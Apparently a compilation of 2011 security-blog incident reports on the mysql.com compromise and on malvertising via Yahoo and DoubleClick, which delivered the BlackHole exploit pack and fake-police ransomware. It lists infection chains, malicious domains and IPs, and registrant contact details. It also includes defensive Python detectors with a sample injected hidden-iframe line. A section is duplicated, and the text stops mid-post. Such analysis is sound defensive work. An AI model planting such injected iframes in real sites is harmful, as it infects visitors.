(Credit: Wayne Huang, Chris Hsiao, NightCola Lin)
Our HackAlert 24x7 website malware monitoring platform indicated today that mysql.com has been hacked and is currently serving malware. The highlighted section of the screenshot above is the injected script. Below is a video showing how visitors are infected when they navigate to the site:
[Infection Chain]
Step 1: http://www.mysql.com
Causes the visiting browser to load the following:
Step 2: http://mysql.com/common/js/s_code_remote.js?ver=20091011
This is the injection point. The entire content of the above .js file can be found here.
The injected section is shown in the above screenshot. The decoded version is as follows:
The text version is available here. This script generates an iframe to Step 3.
Step 3: http://falosfax.in/info/in.cgi?5&ab_iframe=1&ab_badtraffic=1&antibot_hash=1255098964&ur=1&HTTP_REFERER=http://mysql.com/
Throws out a 302 redirect to Step 4.
Step 4: http://truruhfhqnviaosdpruejeslsuy.cx.cc/main.php
This domain hosts the BlackHole exploit pack. It exploits the visitor's browsing platform (the browser and its plugins, such as Adobe Flash, Adobe PDF, Java and others) and, upon successful exploitation, permanently installs a piece of malware on the visitor's machine without the visitor's knowledge. The visitor doesn't need to click or agree to anything; simply visiting mysql.com with a vulnerable browsing platform results in an infection.
Currently, 4 out of 44 vendors on VirusTotal can detect this piece of malware.
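The injection point in this chain is a legitimate first-party .js file that was modified in place. As an added example (not code from the Armorize post and not the HackAlert platform), here is the kind of check a site owner can run against the served file: compare it with a known-good baseline, isolate the inserted lines, and list any iframe or script targets those lines point at outside the site's own hosts. The baseline and tampered contents below are constructed stand-ins (the redirector host is a placeholder under .invalid), not the real s_code_remote.js.

```python
"""Detect an injected block in a served JavaScript file and pull out the
iframe/script targets the injection introduces (added example; constructed data)."""
import difflib
import hashlib
import re
from urllib.parse import urlparse

# Hosts the monitored site is allowed to reference from its own JS (assumption).
FIRST_PARTY_HOSTS = {"mysql.com", "www.mysql.com"}

# Constructed stand-in for the known-good script (not the real file).
BASELINE_JS = """\
var s_account = "siteanalytics";
function s_trackPage(name) {
  s.pageName = name;
  s.t();
}
"""

# Constructed tampered copy: the baseline plus an appended line that writes a
# hidden iframe to a redirector; the host is a placeholder, not a real IoC.
TAMPERED_JS = BASELINE_JS + """\
/*x*/document.write('<iframe src="http://attacker-redirector.invalid/info/in.cgi?5&ur=1" width=1 height=1 style="visibility:hidden"></iframe>');
"""

IFRAME_SRC = re.compile(r"""<iframe[^>]*\ssrc\s*=\s*["']([^"']+)["']""", re.I)
SCRIPT_SRC = re.compile(r"""<script[^>]*\ssrc\s*=\s*["']([^"']+)["']""", re.I)


def sha256_hex(text):
    """Content hash used for the cheap 'did it change at all' comparison."""
    return hashlib.sha256(text.encode("utf-8")).hexdigest()


def inserted_lines(baseline, current):
    """Lines present in the served copy but absent from the baseline."""
    diff = difflib.unified_diff(baseline.splitlines(), current.splitlines(),
                                lineterm="", n=0)
    return [line[1:] for line in diff
            if line.startswith("+") and not line.startswith("+++")]


def external_targets(lines):
    """(host, url) pairs for iframe/script sources that leave the first-party hosts."""
    targets = []
    for line in lines:
        for url in IFRAME_SRC.findall(line) + SCRIPT_SRC.findall(line):
            host = urlparse(url).hostname or ""
            if host and host not in FIRST_PARTY_HOSTS:
                targets.append((host, url))
    return targets


def check_served_js(baseline, current):
    """Verdict for one monitored file: unchanged, or changed plus what was added."""
    if sha256_hex(baseline) == sha256_hex(current):
        return {"changed": False, "inserted": [], "targets": []}
    added = inserted_lines(baseline, current)
    return {"changed": True, "inserted": added, "targets": external_targets(added)}


if __name__ == "__main__":
    verdict = check_served_js(BASELINE_JS, TAMPERED_JS)
    print("changed:", verdict["changed"])
    for host, url in verdict["targets"]:
        print("new external target:", host, url)
```

The regexes only see what is literally in the inserted lines, so an obfuscated injection like the one in this incident would show up as a changed file with no extracted target; that is still the alert that matters, and the decoded script is then reviewed by hand. Fetch the file the way a browser would (same URL, headers and cookies), since injections are often served conditionally.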
[The Attacker]
We don't know much at this point. The following is the information we have on the associated malicious domains.
falosfax.in (Step 3)
Address: 212.95.63.201
Location: Germany / Berlin
Created On:20-Jun-2011 13:17:05 UTC
Sponsoring Registrar:Transecute Solutions Pvt. Ltd. (R120-AFIN)
Registrant Name:CHRISTOPHER J KLEIN
Registrant Street1:7880 SW 132 STREET
Registrant City:MIAMI
Registrant State/Province:Florida
Registrant Postal Code:33156
Registrant Country:US
Registrant Phone:+1.3053771635
Registrant Email:cjklein54@yahoo.com
Admin ID:TS_14483505
Admin Name:CHRISTOPHER J KLEIN
Admin Organization:N/A
Admin Street1:7880 SW 132 STREET
Admin Street2:
Admin Street3:
Admin City:MIAMI
Admin State/Province:Florida
Admin Postal Code:33156
Admin Country:US
Admin Phone:+1.3053771635
Admin Phone Ext.:
Admin FAX:
Admin FAX Ext.:
Admin Email:cjklein54@yahoo.com
Tech Email:cjklein54@yahoo.com
Name Server:NS1.SKYNS1.NET
Name Server:NS2.SKYNS1.NET
truruhfhqnviaosdpruejeslsuy.cx.cc (Step 4)
Address: 46.16.233.108
Location: Sweden / Stockholm
As of now, the mysql.com website is still serving this exploit and malware.
We're in the process of contacting mysql.com. If anyone has contacts there, please drop us an email at wayne@armorize.com
PS: Armorize is hiring presales in the bay area: http://www.linkedin.com/jobs/post?displayJobStatus=&jobId=1910971&split_page=1
Malvertising on Yahoo YieldManager, spreading ransomware acting as Federal German Police (BKA)--Help solve the puzzle!
Posted by: Wayne Huang on 8.31.2011
Categories: Drive-by download ransomware, malvertising, Web malware
Help us solve the puzzle!
(credits: Wayne Huang, Chris Hsiao, NightCola Lin)
Over the past few days, our HackAlert scanning farm has repeatedly detected malvertising on Yahoo YieldManager (RightMedia). Since YieldManager is one of the world's largest ad networks, websites worldwide, big and small, have all been hit. Fortunately, the exploit server is only serving the malware to German visitors.
In the video below, we demonstrate how Ziddu was thus made to serve this German ransomware to its visitors. According to CheckSiteTraffic.com, Ziddu enjoys 1,492,133 page views and 364,825 unique visitors per day.
The malware pretends to be crime-detection software from the Federal German Police. It claims to have found child pornography along with other illegal content on the victim's computer. It claims that the victim's IP, OS, location, ISP, etc., have all been recorded, and locks down the computer completely, "to prevent further abuse."
A fine of 100 Euros must be paid within 24 hours to unlock the computer, or else all data will be deleted. We are in the process of informing all parties involved. This is our report.
(Above: ziddu.com hit by malvertising on Yahoo YieldManager (RightMedia))
(Above: Even Japanese sites were hit)
(Above: The installed ransomware, acting as Federal German Police (BKA))
Below is our video report:
Table of contents
[Summary]
[Attack Trace]
[Malvertising Analysis--The Puzzle]
[The malware]
[Summary]
Incident type: Malvertising
Incident subtype: Drive-by download, ransomware
Responsible ad network: Yahoo YieldManager (RightMedia)
Affected websites: From very large websites such as ziddu.com to websites large and small worldwide. Ziddu, for example, has 1,492,133 page views and 364,825 unique visitors per day.
Affected visitors: German visitors only
Fake advertiser: kineticgames.info
Exploit server: BlackHole exploit pack running on town.incredibleoutcomes.com
Malicious domains:
kineticgames.info (184.172.216.234, ASN 36351, US Dallas)
sahoreen.in (184.172.216.234, ASN 36351, US Dallas)
belygaur.in (184.172.216.234, ASN 36351, US Dallas)
town.incredibleoutcomes.com (195.200.90.129, ASN 35524, Ukraine)
bundespol.net (188.229.97.2, ASN 44872, Romania)
Associated names and emails:
einzahlung@bundespol.net
Vasiliy Pushkin, vasili006@gmail.com
Piotr Pushkin, pppiotr88@gmail.com
[Attack Trace]
Using ziddu.com as an example.
Link 1: (Publisher)
Ziddu's website includes the following ad tag:
<IFRAME FRAMEBORDER=0 MARGINWIDTH=0 MARGINHEIGHT=0 SCROLLING=NO WIDTH=728 HEIGHT=90 SRC="http://ad.globe7.com/st?ad_type=iframe&ad_size=728x90&section=836122"></IFRAME>
Link 2: (Ad Network) http://ad.globe7.com/st?ad_type=iframe&ad_size=728x90&section=836122 is loaded, which contains javascript that generates an iframe to:
Link 3: (Ad Network) http://ad.globe7.com/imp?Z=728x90&s=836122&_salt=2314211323&B=10&u=http%3A%2F%2Fwww.ziddu.com%2F&r=0, which throws back an HTTP 302 redirect to:
Link 4: (Ad Network) http://ad.yieldmanager.com/imp?Z=728x90&s=836122&_salt=2314211323&B=10&u=http%3A%2F%2Fwww.ziddu.com%2F&r=0, which contains javascript that generates an iframe to:
Link 5: (Ad Network) http://ad.globe7.com/iframe3?2YA.ABrCDABgVKUAAAAAAMWJKAAAAAAAAgAEAAYAAAAAAP8AAAACBvPdGQAAAAAAIrsPAAAAAACYIzUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABZlQYAAAAAAAIAAwAAAAAAASuHFtnOtz8BK4cW2c63PwErhxbZzsc.ASuHFtnOxz8zMzMzMzPTPzMzMzMzM9M.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACkuxJPXfCjCqRit3MeuQtEnvXOi1a6Cp0X0hsNAAAAAA==,,http%3A%2F%2Fwww.ziddu.com%2F,B%3D10%26Z%3D728x90%26_salt%3D2314211323%26r%3D0%26s%3D836122,a5451910-d1f1-11e0-906f-87d5341e0e89, which throws an HTTP 302 redirect to:
Link 6: (Ad Network) http://ad.yieldmanager.com/iframe3?2YA.ABrCDABgVKUAAAAAAMWJKAAAAAAAAgAEAAYAAAAAAP8AAAACBvPdGQAAAAAAIrsPAAAAAACYIzUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABZlQYAAAAAAAIAAwAAAAAAASuHFtnOtz8BK4cW2c63PwErhxbZzsc.ASuHFtnOxz8zMzMzMzPTPzMzMzMzM9M.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACkuxJPXfCjCqRit3MeuQtEnvXOi1a6Cp0X0hsNAAAAAA==,,http%3A%2F%2Fwww.ziddu.com%2F,B%3D10%26Z%3D728x90%26_salt%3D2314211323%26r%3D0%26s%3D836122,a5451910-d1f1-11e0-906f-87d5341e0e89, which contains javascript that a) displays the malicious ad, and b) generates an iframe to the exploit server. Note the iframe URL ends with .jpg in order to disguise and be less obvious.
(Full copyable text can be found on snipt here.)
Link 7-a: (Fake Advertiser, Creative) http://kineticgames.info/images/728x90-1-1.gif, which is the actual malicious creative (malvertisement).
Link 7-b: (Fake Advertiser, malicious script) http://kineticgames.info/pubage/728x90.jpg; although the URL ends in .jpg, it actually serves HTML containing an iframe pointing to:
Link 8: (Malicious redirector) http://sahoreen.in/hitcounter.php?u=pubage, which contains an iframe pointing to:
Link 9: (Malicious redirector) http://belygaur.in/ts/in.cgi?pubage, which throws an HTTP 302 redirect pointing to the exploit server:
Link 10: (Exploit server) http://town.incredibleoutcomes.com/index.php?tp=7058439543afabcf, which serves the BlackHole exploit pack. This domain was not registered by the attacker; it is a legitimate domain that has been compromised.
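The trace above is a chain of 302 redirects, iframes and script tags that ends at the exploit server, with one hop (Link 7-b) serving HTML under a .jpg URL. As an added example (not code from the Armorize post), here is an offline walker that reconstructs such a chain from a table of captured responses and flags hops whose URL claims an image while the body is HTML. The captures are constructed to mirror the structure of the trace; every host is a placeholder under .invalid, not one of the domains listed above.

```python
"""Walk an ad-serving chain offline from captured responses, following 302s,
iframes and script tags, and flag 'image' URLs that really serve HTML
(added example; constructed captures)."""
import re
from urllib.parse import urljoin, urlparse

IMAGE_EXT = (".jpg", ".jpeg", ".gif", ".png")
# src= of iframe/script tags; also catches tags inside a document.write('...')
# string in a JavaScript body, which is enough for this constructed sample.
TAG_SRC = re.compile(r"""<(iframe|script)\b[^>]*\ssrc\s*=\s*["']([^"']+)["']""", re.I)

# Constructed captures: url -> (status, body, Location header). Placeholder hosts.
CAPTURES = {
    "http://publisher.invalid/": (200,
        '<html><iframe src="http://adnet.invalid/st?ad_size=728x90"></iframe></html>', None),
    "http://adnet.invalid/st?ad_size=728x90": (200,
        "document.write('<iframe src=\"http://adnet.invalid/imp?Z=728x90\"></iframe>');", None),
    "http://adnet.invalid/imp?Z=728x90": (302, "", "http://adnet.invalid/iframe3?creative=1"),
    "http://adnet.invalid/iframe3?creative=1": (200,
        '<img src="http://advertiser.invalid/images/728x90.gif">'
        '<iframe src="http://advertiser.invalid/pubage/728x90.jpg"></iframe>', None),
    # The '.jpg' that is really an HTML page with a hidden iframe (Link 7-b pattern).
    "http://advertiser.invalid/pubage/728x90.jpg": (200,
        '<html><iframe src="http://redirector.invalid/hitcounter.php?u=pubage"></iframe></html>', None),
    "http://redirector.invalid/hitcounter.php?u=pubage": (302, "", "http://exploit-host.invalid/index.php?tp=0"),
    "http://exploit-host.invalid/index.php?tp=0": (200, "<html>...</html>", None),
}


def looks_like_html(body):
    """Cheap body sniff: markup at the start, or an iframe/script tag early on."""
    head = body.lstrip()[:512].lower()
    return head.startswith("<") or "<iframe" in head or "<script" in head


def next_hops(url, status, body, location):
    """(kind, absolute_url) pairs a browser would fetch after this response."""
    if status in (301, 302, 303, 307) and location:
        return [("redirect", urljoin(url, location))]
    return [(tag.lower(), urljoin(url, src)) for tag, src in TAG_SRC.findall(body)]


def walk_chain(captures, start, max_hops=20):
    """Depth-first walk from the publisher page; one record per visited URL."""
    seen, hops = set(), []
    stack = [(start, "start")]
    while stack and len(hops) < max_hops:
        url, via = stack.pop()
        if url in seen:
            continue
        seen.add(url)
        if url not in captures:
            hops.append({"url": url, "via": via, "status": None,
                         "disguised": False, "uncaptured": True})
            continue
        status, body, location = captures[url]
        path = urlparse(url).path.lower()
        disguised = path.endswith(IMAGE_EXT) and looks_like_html(body)
        hops.append({"url": url, "via": via, "status": status,
                     "disguised": disguised, "uncaptured": False})
        # push in reverse so the first link in the body is followed first
        for kind, nxt in reversed(next_hops(url, status, body, location)):
            stack.append((nxt, kind))
    return hops


def chain_hosts(hops):
    return [urlparse(h["url"]).hostname for h in hops]


def disguised_urls(hops):
    return [h["url"] for h in hops if h["disguised"]]


if __name__ == "__main__":
    chain = walk_chain(CAPTURES, "http://publisher.invalid/")
    for i, h in enumerate(chain, 1):
        flag = "  <-- HTML served under an image extension" if h["disguised"] else ""
        print(f"Link {i}: ({h['via']}, {h['status']}) {h['url']}{flag}")
```

The walker deliberately ignores `<img>` tags: the creative itself (Link 7-a here) is a real image and not part of the redirect path, whereas the `.jpg` that carries an iframe is. The extension/body mismatch is a useful triage signal precisely because legitimate ad creatives never need it.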
[Malvertising Analysis--The Puzzle]
Below are the two typical causes of malvertising:
a) The attacker pretends to be a legitimate advertiser, submits a malicious ad (malvertisement) to an ad network, and tricks the ad network into accepting the submission.
b) The ad network was compromised, and the attacker injected malicious scripts into a link in the ad-serving chain.
So which case is this? For this particular case, it was a bit difficult for us to determine.
Upon first look, it seems to be case (a), because the advertiser in this case, kineticgames.info (184.172.216.234, ASN 36351, US Dallas), has a whois record with a Russian name and street address, yet uses a US IP and an Indian domain name for its name server (ns1.plumdook.in).
HOWEVER, the domain was registered on Aug 9th, 2010, a year ago, and from the screenshot below you can see that it seems to be quite a legitimate website:
Compared to many malvertising incidents we've studied, most fake domains will have been registered very recently and will either not have any website content, or will have content illegally mirrored (copied) from other websites.
This doesn't seem to be the case. So, is it case (b), where kineticgames.info is indeed a legitimate website, but has been compromised to serve malvertisements?
Seems reasonable, but only until we look at the other associated malicious domains. These are:
sahoreen.in (184.172.216.234, ASN 36351, US Dallas)
belygaur.in (184.172.216.234, ASN 36351, US Dallas)
These two domains were both created very recently, on the same day--July 7th, 2011. The whois records show the registrant to be "Piotr Poshkin," which resembles kineticgames.info's current "Vasiliy Pushkin." Furthermore, the phone number, street address, and zip codes are exactly the same as kineticgames.info's.
Kineticgames.info actually has a sister domain name: kinetic-games.com, registered on the same day last year (Aug 9th, 2010), and serving the same content. Both were initially registered under Bob Stevenson of Spain. Then, on July 14th and July 17th, 2011, kinetic-games.com and kineticgames.info were respectively transferred to the current contact (according to whois records) "Vasiliy Pushkin" of Russia.
Could it be that the new owner is intentionally doing malvertising using these domains and the website, because the identity seems legitimate?
Or could it be that none of this matters, and that kineticgames.info has simply been hacked into, the attackers used it to submit the malvertisement, and they intentionally registered the malicious redirector domains sahoreen.in and belygaur.in with whois records that resemble that of kineticgames.info?
Finally, two additional pieces of important information. First, according to Internet Archive (Wayback Machine), as of Jan 28th, 2011, kinetic-games.com had no actual website content--the owner was just registering the domain to sell as a premium domain:
Second, the website currently contains many vulnerabilities. It should be quite easy for someone to hack into both websites.
So what's the deal here?
We cannot make a conclusion right here. Perhaps the reader can help solve the puzzle?
[The Malware]
The malware pretends to be crime-detection software from the Federal German Police. As you can see in the screenshot above, it uses a logo stolen from the real Federal German Police (Bundespolizei). It claims to have found child pornography along with other illegal content on the victim's computer. It claims that the victim's IP, OS, location, ISP, etc., have all been recorded, and locks down the computer completely, "to prevent further abuse."
A fine of 100 Euros must be paid within 24 hours to unlock the computer, or else all data will be deleted. We are in the process of informing all parties involved. This is our report.
This strain of ransomware has been around for a few months already, but improvements seen in this version include:
a) They now have an email address, "einzahlung@bundespol.net", that somewhat resembles the Federal German Police, who use "@bundespolizei.de". The domain was registered through Bizcn.com, a registrar in China.
b) They now support two payment gateways, Ukash and paysafecard.
Below is a translation of the text:
Attention!
Illegal operational activities have been detected. Based on laws of the Federal Republic of Germany, the system has been locked. The following legal violation has been detected: Your IP _______ was detected to have visited pages containing pornography, child pornography, bestiality and violence against children. At the same time, your computer has been identified to contain video files involving pornography, violence, and child pornography content! Furthermore, spam emails containing terrorism content were also sent from here. Your computer is therefore locked in order to eliminate the above illegal activities.
Your details:
IP, location, OS, ISP, etc.
In order to unlock this computer, you are obligated by law to pay a 100 Euro fine. You must make the payment within 24 hours. If payment has not been made within the allotted time, your hard disk will be irreversibly formatted.
1) Payment via Ukash:
To perform the transaction, please enter your purchased voucher code into the payment textbox and press OK. In case of errors, you should email your code to einzahlung@bundespol.net.
2) Payment via paysafecard:
Please input the code into the payment textbox and press OK. In case of errors, you should email your code to einzahlung@bundespol.net.
Malvertising on Google Doubleclick ongoing
(credits: Wayne Huang, Chris Hsiao, NightCola Lin)
In the past few days, our scanners noticed malvertising on Google DoubleClick. The malvertisement is being provided to DoubleClick by Adify (Now a part of Cox Digital Solutions), and to Adify by Pulpo Media, and to Pulpo Media by the malicious attackers pretending to be advertisers: indistic.com. The malvertisement causes visitor browsers to load exploits from kokojamba.cz.cc (the exploit domain), which is running the BlackHole exploit pack. Currently, 7 out of 44 vendors on VirusTotal can detect this malware.
This is our report. We plan to put up the video later; we still need to narrate it, which will take some time. As DoubleClick is a very large ad network, we decided to put up the post quickly.
The first link in the infection chain is the following standard script for all websites using Google DoubleClick for Publishers (Google DFP):
(Link 1:)
<script type='text/javascript' src='hxxp://partner.googleadservices.com/gampad/google_service.js'></script>
Which generates a <script src> tag, causing the browser to load javascript from:
(Link 2:)
http://partner.googleadservices.com/gampad/google_ads.js
Which generates a <script src> tag, causing the browser to load javascript from:
(Link 3:)
http://pubads.g.doubleclick.net/gampad/ads?correlator=1314244145446&output=json_html&callback=GA_googleSetAdContentsBySlotForSync&impl=s&client=ca-pub-1199834677431615&slotname=LA_PRENSA_Poderes_728x90_Superior&page_slots=LA_PRENSA_Poderes_728x90_Superior&cookie=ID%3D6ece38c99f627779%3AT%3D1314244080%3AS%3DALNI_MbRwmcAoAFohCjkKxnj_JXcxZEUEA&url=http%3A%2F%2Fwww.laprensa.com.ni%2F2011%2F08%2F23%2Fpoderes&lmt=1314244147&dt=1314244147962&cc=100&oe=utf-8&biw=878&bih=477&ifi=1&adk=2910702588&u_tz=480&u_his=2&u_java=true&u_h=1920&u_w=1080&u_ah=1892&u_aw=1080&u_cd=32&flash=10.1.102.64&gads=v2&ga_vid=2122880267.1314244061&ga_sid=1314244061&ga_hid=187578555&ga_fc=true
Which generates a <script src> tag, causing the browser to load javascript from Adify (Now a part of Cox Digital Solutions):
(Link 4:)
http://ad.afy11.net/srad.js?azId=1000004110207
Which generates a <script src> tag, causing the browser to load javascript from:
(Link 5:)
http://ad.afy11.net/ad?asId=1000004110207&sd=2x728x90&ct=15&enc=1&nif=1&sf=0&sfd=0&ynw=0&anw=1&rand=55943306&rk1=56285031&rk2=1314244149.806&pt=0&asc=3x133&vad=878x477
Which generates an iframe, causing the browser to load javascript from tentaculos.net, which is a part of Pulpo Media:
(Link 6:)
http://d1.tentaculos.net/afr.php?zoneid=2100&cb=INSERT_RANDOM_NUMBER_HERE&ct0=INSERT_CLICKURL_HERE
Which gives an HTTP 302 redirect to:
(Link 7:)
http://d1.tentaculos.net/afr.php?ct=1&zoneid=2100&cb=INSERT_RANDOM_NUMBER_HERE&ct0=INSERT_CLICKURL_HERE
Which generates a <script src> tag, causing the browser to load javascript from:
(Link 8:)
http://indistic.com/media/display/engine/091/impr/j/hd/?gfb=178k1&tprk=837168u&campaignid=142038917
This is the malicious advertiser. The above javascript generates an iframe, causing the browser to load from the exploit domain kokojamba.cz.cc (Link 9-a), and also the creative (the banner ad) itself (Link 9-b) as a .png file. Here's a snippet of this javascript:
The entire javascript code can be found here.
The domain "indistic.com" was registered on Aug 12, 2011 (evidence 1) by "Marcene D. Rhodes" (marcenedrhodessm@yahoo.com). The domain currently runs on IP 95.64.46.84 (AS49734) (thank you Jason D.Seimesi), which is located in Romania. The whois records show a US street address but with a Lithuanian phone number and a Romanian IP (evidence 2):
=====================================
Administrative Contact:
Name: Marcene D. Rhodes
Organization: no
Address: 4653 Twin House Lane
City: Mount Vernon
Province/state: MO
Country: US
Postal Code: 65712
Phone: +370.956734778
Fax: +370.956734778
=====================================
The domain is using FreeDNS on freedns.afraid.org (evidence 3).
So there were at least three pieces of evidence here that indistic.com was not a legitimate advertiser. This malvertisement should not have been let into this chain of ad networks.
Furthermore, as Jason D.Seimesi pointed out, the same IP is also used by pisofta.com, another domain also registered on Aug 12. Therefore there is likely more than one malicious advertiser identity associated with this effort.
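The three pieces of evidence above (a days-old registration, a phone country code that contradicts the registrant's country, free DNS hosting) plus the shared IP with another fresh domain are exactly the checks an ad network could automate before accepting an advertiser. As an added example (not code from the Armorize post), the triage function below scores a registration record on those signals. The record values are the ones quoted in the post; the observation date, the nameserver hostnames, the dialling-code table and the 30-day threshold are assumptions.

```python
"""Score an advertiser domain for registration/hosting inconsistencies
(added example; record values from the post, other inputs assumed)."""
from datetime import date
import re

# Dialling code -> ISO country, only the entries this example needs.
DIAL_CODES = {"1": "US", "370": "LT", "40": "RO", "49": "DE", "7": "RU"}
# Free/dynamic DNS providers to flag; afraid.org is the one named in the post.
FREE_DNS_SUFFIXES = ("afraid.org",)

# Built from the whois and hosting details in the post. The nameserver
# hostnames are placeholders (the post only says 'FreeDNS on freedns.afraid.org').
INDISTIC = {
    "domain": "indistic.com",
    "created": date(2011, 8, 12),
    "registrant_country": "US",
    "phone": "+370.956734778",
    "nameservers": ["ns1.afraid.org", "ns2.afraid.org"],
    "ip": "95.64.46.84",
    "ip_country": "RO",
    "siblings_on_ip": [{"domain": "pisofta.com", "created": date(2011, 8, 12)}],
}


def phone_country(phone):
    """Map a whois phone such as '+370.956734778' to a country via its dialling code."""
    digits = re.sub(r"\D", "", phone.split(".")[0])
    for length in (3, 2, 1):  # longest prefix first
        country = DIAL_CODES.get(digits[:length])
        if country:
            return country
    return None


def domain_age_days(rec, observed_on):
    return (observed_on - rec["created"]).days


def triage(rec, observed_on, young_days=30):
    """Return the domain, a score (number of signals) and the human-readable reasons."""
    reasons = []
    age = domain_age_days(rec, observed_on)
    if age < young_days:
        reasons.append(f"registered {age} days before observation")
    phone_cc = phone_country(rec["phone"])
    if phone_cc and phone_cc != rec["registrant_country"]:
        reasons.append(f"phone dialling code is {phone_cc}, registrant country is "
                       f"{rec['registrant_country']}")
    if any(ns.lower().endswith(FREE_DNS_SUFFIXES) for ns in rec["nameservers"]):
        reasons.append("nameservers on a free DNS service")
    if rec["ip_country"] != rec["registrant_country"]:
        reasons.append(f"hosted in {rec['ip_country']}, registrant in {rec['registrant_country']}")
    for sib in rec.get("siblings_on_ip", []):
        if (observed_on - sib["created"]).days < young_days:
            reasons.append(f"shares IP {rec['ip']} with recently registered {sib['domain']}")
    return {"domain": rec["domain"], "score": len(reasons), "reasons": reasons}


if __name__ == "__main__":
    # Observation date is assumed; it only has to be shortly after registration.
    result = triage(INDISTIC, date(2011, 8, 25))
    print(result["domain"], "score", result["score"])
    for reason in result["reasons"]:
        print(" -", reason)
```

None of these signals is conclusive on its own (plenty of honest registrants use a foreign phone or a free DNS host), which is why the function returns the individual reasons rather than a verdict: a score of two or more is a reasonable trigger for manual review of the creative before it enters the serving chain.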
(Link 9-a, BlackHole exploit pack:)
http://kokojamba.cz.cc/index.php?tp=2733de342143bbc7
kokojamba.cz.cc is the exploit domain running the BlackHole exploit pack. It is currently running on IP 178.238.36.64, located in Jihomoravský kraj of Czech Republic.
(Link 9-b:)
http://indistic.com/crt/1Npstr/728.PNG
Currently, 7 out of 44 vendors on VirusTotal can detect this malware:
We are in the process of informing all parties involved. If you know more about this incident, please email us at wayne@armorize.com
Read more (rest of article)...
In the past few days, our scanners noticed malvertising on Google DoubleClick. The malvertisement is being provided to DoubleClick by Adify (Now a part of Cox Digital Solutions), and to Adify by Pulpo Media, and to Pulpo Media by the malicious attackers pretending to be advertisers: indistic.com. The malvertisement causes visitor browsers to load exploits from kokojamba.cz.cc (the exploit domain), which is running the BlackHole exploit pack. Currently, 7 out of 44 vendors on VirusTotal can detect this malware.
This is our report. We plan to put up the video later--we still need to narrate it, which will take some time. As DoubleClick is a very large AD network, we decided to put up the post quickly.
The first link in the infection chain is the following standard script for all websites using Google DoubleClick for Publishers (Google DFP):
(Link 1:)
<script type='text/javascript' src='hxxp://partner.googleadservices.com/gampad/google_service.js'>
Which generates a <script src> tag, causing the browser to load javascript from:
(Link 2:)
http://partner.googleadservices.com/gampad/google_ads.js
Which generates a <script src> tag, causing the browser to load javascript from:
(Link 3:)
http://pubads.g.doubleclick.net/gampad/ads?correlator=1314244145446&output=json_html&callback=GA_googleSetAdContentsBySlotForSync&impl=s&client=ca-pub-1199834677431615&slotname=LA_PRENSA_Poderes_728x90_Superior&page_slots=LA_PRENSA_Poderes_728x90_Superior&cookie=ID%3D6ece38c99f627779%3AT%3D1314244080%3AS%3DALNI_MbRwmcAoAFohCjkKxnj_JXcxZEUEA&url=http%3A%2F%2Fwww.laprensa.com.ni%2F2011%2F08%2F23%2Fpoderes&lmt=1314244147&dt=1314244147962&cc=100&oe=utf-8&biw=878&bih=477&ifi=1&adk=2910702588&u_tz=480&u_his=2&u_java=true&u_h=1920&u_w=1080&u_ah=1892&u_aw=1080&u_cd=32&flash=10.1.102.64&gads=v2&ga_vid=2122880267.1314244061&ga_sid=1314244061&ga_hid=187578555&ga_fc=true
Which generates a <script src> tag, causing the browser to load javascript from Adify (Now a part of Cox Digital Solutions):
(Link 4:)
http://ad.afy11.net/srad.js?azId=1000004110207
Which generates a <script src> tag, causing the browser to load javascript from:
(Link 5:)
http://ad.afy11.net/ad?asId=1000004110207&sd=2x728x90&ct=15&enc=1&nif=1&sf=0&sfd=0&ynw=0&anw=1&rand=55943306&rk1=56285031&rk2=1314244149.806&pt=0&asc=3x133&vad=878x477
Which generates an iframe, causing the browser to load javascript from tentaculos.net, which is a part of Pulpo Media:
(Link 6:)
http://d1.tentaculos.net/afr.php?zoneid=2100&cb=INSERT_RANDOM_NUMBER_HERE&ct0=INSERT_CLICKURL_HERE
Which gives an HTTP 302 redirect to:
(Link 7:)
http://d1.tentaculos.net/afr.php?ct=1&zoneid=2100&cb=INSERT_RANDOM_NUMBER_HERE&ct0=INSERT_CLICKURL_HERE
Which generates a <script src> tag, causing the browser to load javascript from:
(Link 8:)
http://indistic.com/media/display/engine/091/impr/j/hd/?gfb=178k1&tprk=837168u&campaignid=142038917
This is the malicious advertiser. The above javascript generates an iframe, causing the browser to load from the exploit domain kokojamba.cz.cc (Link 9-a), and also the creative (the banner ad) itself (Link 9-b) as a .png file. Here's a snippet of this javascript:
The entire javascript code can be found here.
The domain "indistic.com" was registered on Aug 12, 2011 (evidence 1) by "Marcene D. Rhodes" (marcenedrhodessm@yahoo.com). The domain currently runs on IP 95.64.46.84 (AS49734) (thank you Jason D. Seimesi), which is located in Romania. The whois records show a US street address but with a Lithuanian phone number and a Romanian IP (evidence 2):
=====================================
Administrative Contact:
Name: Marcene D. Rhodes
Organization: no
Address: 4653 Twin House Lane
City: Mount Vernon
Province/state: MO
Country: US
Postal Code: 65712
Phone: +370.956734778
Fax: +370.956734778
=====================================
The domain is using FreeDNS on freedns.afraid.org (evidence 3).
So there were at least three pieces of evidence here that indistic.com wasn't a legitimate advertiser. This malvertisement shouldn't have been let into this chain of ad networks.
Furthermore, as Jason D. Seimesi pointed out, the same IP is also used by pisofta.com, another domain also registered on Aug 12. Therefore there is likely more than one malicious advertiser identity associated with this effort.
(Link 9-a, BlackHole exploit pack:)
http://kokojamba.cz.cc/index.php?tp=2733de342143bbc7
kokojamba.cz.cc is the exploit domain running the BlackHole exploit pack. It is currently running on IP 178.238.36.64, located in Jihomoravský kraj of Czech Republic.
(Link 9-b:)
http://indistic.com/crt/1Npstr/728.PNG
Currently, 7 out of 44 vendors on VirusTotal can detect this malware:
We are in the process of informing all parties involved. If you know more about this incident, please email us at wayne@armorize.com
k985ytv mass compromise ongoing, spreads fake antivirus
Posted by: Wayne Huang on 8.17.2011
Categories: Drive-by download, fake antivirus, k985ytv, Mass Injection, Web malware
(Credits: Wayne Huang, Chris Hsiao, NightCola Lin)
On August 14, we started to see mass compromise of websites to inject malicious iframes that spread fake antivirus malware. The attack is ongoing, and this is our report.
[Table of Contents]
[1. Summary]
[2. The visitor infection process]
[3. The fake antivirus being spread]
[4. Sample FTP logs of infected websites]
[5. Sample list of infected websites and screenshots of some of them]
[1. Summary]
1. Initial detection date: August 14.
